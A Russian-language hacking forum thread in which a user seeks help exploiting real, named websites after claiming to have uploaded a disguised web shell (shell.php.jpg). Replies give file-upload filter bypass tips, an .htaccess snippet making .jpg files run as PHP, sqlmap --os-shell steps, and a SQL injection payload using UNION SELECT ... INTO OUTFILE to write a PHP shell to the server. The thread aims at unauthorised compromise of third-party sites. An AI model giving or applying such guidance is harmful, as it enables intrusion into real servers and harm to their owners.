PDA

Просмотр полной версии : shell.php.jpg

.Light.
27.12.2015, 21:52
Ребята помогите,удалось залить шелл на сайт под видом shell.php.jpg,что делать дальше?)
grimnir
27.12.2015, 22:14
когда его открываешь, он обрабатываеться как картинка или как php?

Хотя,если говоришь шелл- то дальше в теме монетизация ваших шеллов
.Light.
27.12.2015, 22:18
Как картинка
Chrome~
27.12.2015, 22:19
Так ты залил картинку а не шелл.
grimnir
27.12.2015, 22:21
.Light. said:
↑ (https://antichat.live/posts/3932966/)
Как картинка


http://hackers2devnull.blogspot.co.uk/2013/05/how-to-shell-server-via-image-upload.html

пункт 4
.Light.
27.12.2015, 22:24
.htaccess не хочет заливать(
grimnir
27.12.2015, 22:28
.Light. said:
↑ (https://antichat.live/posts/3932976/)
.htaccess не хочет заливать(


Тогда придеться повозиться с обходом фильтров) /threads/307894/ (https://antichat.live/threads/307894/)

https://pentestlab.wordpress.com/2012/11/29/bypassing-file-upload-restrictions/ (https://antichat.live/threads/307894/)
masolit
30.12.2015, 12:03
ключевые слова ))) Burp Suite, upload, null byte, hex edit, interception.
5maks5
30.12.2015, 12:19
masolit said:
↑ (https://antichat.live/posts/3934082/)
ключевые слова ))) Burp Suite, upload, null byte, hex edit, interception.


mime-type
.Light.
01.01.2016, 23:14
Что можно сделать с этим?

Warning: include(includes/lang/lang_2'.php) [function.include (http://www.swimwearthailand.com/function.include)]: failed to open stream: No such file or directory in /home/www/afea6d68840466bf02fc82e12ce43740/web/categories.php on line 13

Warning: include(includes/lang/lang_2'.php) [function.include (http://www.swimwearthailand.com/function.include)]: failed to open stream: No such file or directory in /home/www/afea6d68840466bf02fc82e12ce43740/web/categories.php on line 13

Warning: include() [function.include (http://www.swimwearthailand.com/function.include)]: Failed opening 'includes/lang/lang_2'.php' for inclusion (include_path='.:/opt/php/lib/php') in /home/www/afea6d68840466bf02fc82e12ce43740/web/categories.php on line 13

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/www/afea6d68840466bf02fc82e12ce43740/web/includes/plug.php on line 877

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/afea6d68840466bf02fc82e12ce43740/web/categories.php on line 304
blackbox
08.01.2016, 00:31
.Light. said:
↑ (https://antichat.live/posts/3934903/)
Что можно сделать с этим?
Warning
: include(includes/lang/lang_2'.php) [
function.include (http://www.swimwearthailand.com/function.include)
]: failed to open stream: No such file or directory in
/home/www/afea6d68840466bf02fc82e12ce43740/web/categories.php
on line
13
Warning
: include(includes/lang/lang_2'.php) [
function.include (http://www.swimwearthailand.com/function.include)
]: failed to open stream: No such file or directory in
/home/www/afea6d68840466bf02fc82e12ce43740/web/categories.php
on line
13
Warning
: include() [
function.include (http://www.swimwearthailand.com/function.include)
]: Failed opening 'includes/lang/lang_2'.php' for inclusion (include_path='.:/opt/php/lib/php') in
/home/www/afea6d68840466bf02fc82e12ce43740/web/categories.php
on line
13
Warning
: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
/home/www/afea6d68840466bf02fc82e12ce43740/web/includes/plug.php
on line
877
Warning
: mysql_num_rows(): supplied argument is not a valid MySQL result resource in
/home/www/afea6d68840466bf02fc82e12ce43740/web/categories.php
on line
304


Зависит от того, на какие переменные можно влиять. Похоже на lfi (если версия php старая, то можно окончание .php обрезать и любые файлы подключать) и на sql injection. Можно попробовать тем же sqlmap'ом разведать. Или вручную.
.Light.
08.01.2016, 17:35
Как можно залить шелл не имея доступ к админке.А только скулю?
kingbeef
08.01.2016, 20:46
.Light. said:
↑ (https://antichat.live/posts/3937610/)
Как можно залить шелл не имея доступ к админке.А только скулю?


С помощью into outfile

Нужно знать полный путь.

MQ=off

File_priv=Y
.Light.
08.01.2016, 22:12
kingbeef said:
↑ (https://antichat.live/posts/3937675/)
С помощью into outfile
Нужно знать полный путь.
MQ=off
File_priv=Y


А есть софт для этого?
kingbeef
08.01.2016, 22:24
.Light. said:
↑ (https://antichat.live/posts/3937718/)
А есть софт для этого?


sqlmap
.Light.
08.01.2016, 22:33
kingbeef said:
↑ (https://antichat.live/posts/3937729/)
sqlmap


А можешь пример команды показать ?
kingbeef
08.01.2016, 23:11
.Light. said:
↑ (https://antichat.live/posts/3937734/)
А можешь пример команды показать ?


Я не пользуюсь им, в данном разделе есть закрепленная тема с вопросами про sqlmap .
BabaDook
09.01.2016, 00:18
.Light. said:
↑ (https://antichat.live/posts/3937734/)
А можешь пример команды показать ?


os-shell

далее тебя спросит какая технология используется выберай 4 ПХП дефолт

далее тебя спросит путь . жми 2 и вписывай туда путь собственно всё
.Light.
09.01.2016, 10:19
BabaDook said:
↑ (https://antichat.live/posts/3937763/)
os-shell
далее тебя спросит какая технология используется выберай 4 ПХП дефолт
далее тебя спросит путь . жми 2 и вписывай туда путь собственно всё


А в чем разница

os-shell ?

sql shell ?

Есть джаббер?
erwerr2321
09.01.2016, 12:21
.Light. said:
↑ (https://antichat.live/posts/3937817/)
А в чем разница
os-shell ?
sql shell ?
Есть джаббер?


Так, ты слишком много вопросов задаёшь!

Ты спросил за софт, тебе ответили, спросил пример команды, тебе ответили, теперь ты вдруг за разницу --os-shell и --sql-shell начал спрашивать...очень интересно!

Ты б лучше нам рассказал, что у тебя получилось!?!
erwerr2321
09.01.2016, 13:18
.Light. said:
↑ (https://antichat.live/posts/3937872/)
Попробуй шел залить


Неееееееееее, я ленюсь!
.Light.
09.01.2016, 13:19
ms13 said:
↑ (https://antichat.live/posts/3937879/)
Неееееееееее, я ленюсь!


ну вот -os shell зальется у тебя или нет?))
erwerr2321
09.01.2016, 13:24
.Light. said:
↑ (https://antichat.live/posts/3937880/)
ну вот -os shell зальется у тебя или нет?))


нет, я ж путь не знаю... поудаляй свои посты, и еси чё в ЛС
BabaDook
09.01.2016, 19:00
Я не профи конечно , но os_shell заливает файл аплоидер на сервер, через который ты можешь заливать файлы или сразу заливать шел и если поверёт, не всегда конечно попадаешь в шел БД, где можешь делать запросы.

sql-shell ты сразу попадаешь в шел бд
erwerr2321
09.01.2016, 19:03
BabaDook said:
↑ (https://antichat.live/posts/3938006/)
Я не профи конечно , но os_shell заливает файл аплоидер на сервер, через который ты можешь заливать файлы или сразу заливать шел


Да, ты прав!

Но в его случае File_priv=N, я уже проверил!
BabaDook
09.01.2016, 19:05
ms13 said:
↑ (https://antichat.live/posts/3938007/)
Да, ты прав!
Но в его случае File_priv=N, я уже проверил!


Тогда можно надеется что будет возможность прочитать файлы, очень далеко не всегда такое есть при файл прив Н
kingbeef
09.01.2016, 20:30
BabaDook said:
↑ (https://antichat.live/posts/3938009/)
Тогда можно надеется что будет возможность прочитать файлы, очень далеко не всегда такое есть при файл прив Н


Покажи.
BabaDook
09.01.2016, 21:55
kingbeef said:
↑ (https://antichat.live/posts/3938053/)
Покажи.


https://rdot.org/forum/showthread.php?t=741
blackbox
10.01.2016, 11:41
Мне интересно по первому посту: где вообще shell.php.jpg может исполнится как скрипт? При каких-таких настройках.
BabaDook
10.01.2016, 16:25
blackbox said:
↑ (https://antichat.live/posts/3938254/)
Мне интересно по первому посту: где вообще shell.php.jpg может исполнится как скрипт? При каких-таких настройках.


когда автоматом подставляется .php
faza02
10.01.2016, 17:36
blackbox said:
↑ (https://antichat.live/posts/3938254/)
Мне интересно по первому посту: где вообще shell.php.jpg может исполнится как скрипт? При каких-таких настройках.


https://rdot.org/forum/showpost.php?p=1142&postcount=5
blackbox
10.01.2016, 18:10
yarbabin said:
↑ (https://antichat.live/posts/3938392/)
https://rdot.org/forum/showpost.php?p=1142&postcount=5


Это из категории file.php.giflalala, file.php.lalalajpg -- кривые регулярки и mod_mime?


BabaDook said:
↑ (https://antichat.live/posts/3938357/)
когда автоматом подставляется .php


А такое бывает? Зачем тогда как jpg загружать?
Dark~Angel
11.01.2016, 04:48
blackbox said:
↑ (https://antichat.live/posts/3938254/)
Мне интересно по первому посту: где вообще shell.php.jpg может исполнится как скрипт? При каких-таких настройках.


Так, вроде jpg можно интерпретировать как скрипт! .htaccess


Code:
RemoveHandler .jpg
AddType application/x-httpd-php .jpg
.Light.
11.01.2016, 08:45
Подскажите как определить правельность пути /home/admin/sites/

Нашел скулю.Нашел полный путь.Пытаюсь залить шелл пишет ошибку 403
BabaDook
11.01.2016, 15:38
.Light. said:
↑ (https://antichat.live/posts/3938654/)
Подскажите как определить правельность пути /home/admin/sites/
Нашел скулю.Нашел полный путь.Пытаюсь залить шелл пишет ошибку 403


load_file('/home/u232323/public_html/index.php') если уж нет доверия к логам. 403 доступ запрещён , waf есть?
blackbox
11.01.2016, 22:06
Dark~Angel said:
↑ (https://antichat.live/posts/3938629/)
Так, вроде jpg можно интерпретировать как скрипт! .htaccess

Code:
RemoveHandler .jpg
AddType application/x-httpd-php .jpg



Ну да, но тогда просто shell.jpg залить можно.
.Light.
12.01.2016, 18:19
А можете помочь в понимании этой уязвимости?)

http://www.prodisney.ru/index.php?page=http://site/shell.txt?

Отображает код шелла.

А в таком виде

http://www.prodisney.ru/index.php?page=http://site/shell.php

Отображает мой хостинг.
Dark~Angel
14.01.2016, 19:06
blackbox said:
↑ (https://antichat.live/posts/3939026/)
Ну да, но тогда просто shell.jpg залить можно.


Yes master!
blackbox
15.01.2016, 12:46
.Light. said:
↑ (https://antichat.live/posts/3939395/)
А можете помочь в понимании этой уязвимости?)
http://www.prodisney.ru/index.php?page=http://site/shell.txt?
Отображает код шелла.
А в таком виде
http://www.prodisney.ru/index.php?page=http://site/shell.php
Отображает мой хостинг.


Там нет уязвимости, содержимое просто через iframe отображается, насколько я понял.
0xrust
15.01.2016, 14:45
.Light. said:
↑ (https://antichat.live/posts/3938654/)
Подскажите как определить правельность пути /home/admin/sites/
Нашел скулю.Нашел полный путь.Пытаюсь залить шелл пишет ошибку 403


если у юзера sql нет FILE PRIVILEGES то писать ничего на сервер не получится через инжект

если нет STACKED QUERIES, а в сетапе PHP-MYSQL их обычно нет, то кроме селектов из БД мало что можно придумать
psihoz26
20.01.2016, 16:17
BabaDook said:
↑ (https://antichat.live/posts/3938009/)
Тогда можно надеется что будет возможность прочитать файлы, очень далеко не всегда такое есть при файл прив Н


Это только в sql консолях работает так как при инъекции ты не сможешь превратить select(например) запрос в load
.Light.
21.01.2016, 07:10
Могу сделать запись в БД,подскажите как залить шел?
ArmusIAm
21.01.2016, 08:22
.Light. said:
↑ (https://antichat.live/posts/3943042/)
Могу сделать запись в БД,подскажите как залить шел?




2.2.1 Запись в файл
Есть в MYSQL такая интересная функция типа
SELECT … INTO OUTFILE
позволяющая записывать информацию в файл. Либо такая конструкция
SELECT ... INTO DUMPFILE
они почти похоже и можно использовать любую.
Пример:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt' --
Для нее работает несколько ограничений.

Запрещенно перезаписывание файлов

Требуются привилегии типа FILE

(!)Обязательны настоящие кывычки в указании имени файла

А вот что бы нам мешало сделать веб шел? Вот например так:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --
Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php. Врипринципе можно найти еще одну ошибку по отчету которой будет виден путь на сервере или оставить в корне сервера и подцепить его локальным инклудом, но это уже другая тема.


/threads/43966/ (https://antichat.live/threads/43966/)
psihoz26
23.01.2016, 00:34
Насчет перезаписи файлов, на freebsd удавалось